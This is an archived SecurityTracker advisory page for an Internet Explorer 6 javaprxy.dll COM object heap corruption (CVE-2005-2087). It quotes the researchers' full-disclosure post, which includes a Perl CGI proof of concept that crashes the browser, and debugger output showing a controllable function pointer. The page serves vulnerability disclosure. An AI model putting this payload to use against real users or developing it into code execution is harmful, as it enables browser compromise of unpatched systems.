SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Microsoft Internet Explorer Vendors:   Microsoft
Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1014329
SecurityTracker URL:  http://securitytracker.com/id/1014329
CVE Reference:   CVE-2005-2087   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jun 29 2005
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 6.0 SP1 and prior versions; Tested on 6.0.2900.2180
Description:   A vulnerability was reported in Microsoft Internet Explorer in 'javaprxy.dll'. A remote user can cause the target user's browser to crash or execute arbitrary code.

A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a heap overflow in 'javaprxy.dll' and cause the target user's browser to crash. Specially crafted object tags can cause certain COM componenets to crash.

It is also possible to overwrite a function pointer to execute arbitrary code.

A demonstration exploit from FrSIRT is available at:

http://www.frsirt.com/exploits/20050702.iejavaprxyexploit.pl.php

The vendor was notified on June 17, 2005.

sk0L and Martin Eiszner from SEC-CONSULT discovered this vulnerability.

Impact:   A remote user can cause the target user's browser to crash.

A remote user can execute arbitrary code on the target system.

Solution:   No solution was available at the time of this entry.

Microsoft has described some workarounds at:

http://www.microsoft.com/technet/security/advisory/903144.mspx

Vendor URL:  www.microsoft.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 2 2005 (Vendor Describes Workarounds) Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Crash the Browser
Microsoft has confirmed and has described some workarounds.
Jul 5 2005 (Vendor Issues Killbit Workaround for Download) Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Execute Arbitrary Code
Microsoft has issued a killbit package as a workaround.
Jul 12 2005 (Vendor Issues Fix) Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Execute Arbitrary Code
Microsoft has issued a fix.



 Source Message Contents

Subject:  [Full-disclosure] SEC-CONSULT SA-20050629-0


SEC-CONSULT Security Advisory < 20050629-0 >
==================================================================================
             title: IE6 javaprxy.dll COM instantiation heap corruption
                    vulnerability
           program: Internet Explorer
vulnerable version: 6.0.2900.2180
          homepage: www.microsoft.com
             found: 2005-06-17
                by: sk0L & Martin Eiszner / SEC-CONSULT /
www.sec-consult.com
==================================================================================


background:
---------------

Internet Explorer supports instantiation of non-ActiveX controls, e.g
COM objects, via <object> tags. according to M$, COM components respond
gracefully to attempts to treat them as non-ActiveX controls. on the
contrary, we found that at least 20 of the objects available on an
average XP system either lead to an instant crash or an exception after
a few reloads.


vulnerability overview:
---------------

Loading HTML documents with certain embedded CLSIDs results in
null-pointer exceptions or memory corruption. in one case, we could
leverage this bug to overwrite a function pointer in the data segment.
it *may* be possible to exploit this issue to execute arbitrary code in
the context of IE.


proof of concept:
---------------

this simple CGI should crash IE.


---------------

#!/usr/bin/perl

# in order for this to work javaprxy.dll must be available on the client.

my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll

my $html1 = "<html><body>\n<object
classid=\"CLSID:".$clsid."\"></object>\n";
my $html2 = "\n</body><script>location.reload();</script></html>\n";

print "Content-Type: text/html;\r\n\r\n";

print $html1.("A"x30000).$html2;

---------------

on our lab machine, we, end up with eax=00410041, and an exception
occurs at the following location in javaprxy.dll:

---------------

.text:7C508660                 mov     eax, [ecx]
.text:7C508662                 test    eax, eax
.text:7C508664                 jz      short locret_7C50866C
.text:7C508666                 mov     ecx, [eax]
.text:7C508668                 push    eax
.text:7C508669                 call    dword ptr [ecx+8]

---------------

as you can see, this situation may be exploitable, considering that we
have some level of control over eax.


vulnerable versions:
---------------

javaprxy.dll 5.00.3810
internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519

these are the versions tested, other versions may of course be vulnerable.

vendor status:
---------------
vendor notified: 2005-06-17
vendor response: 2005-06-17
patch available: ?

microsoft does not confirm the vulnerability, as their product team can
not reproduce condition. however, they are looking at making changes to
handle COM objects in a more robust manner in the future.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SGT ::: walter|bruder, flo, tke, dfa :::


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC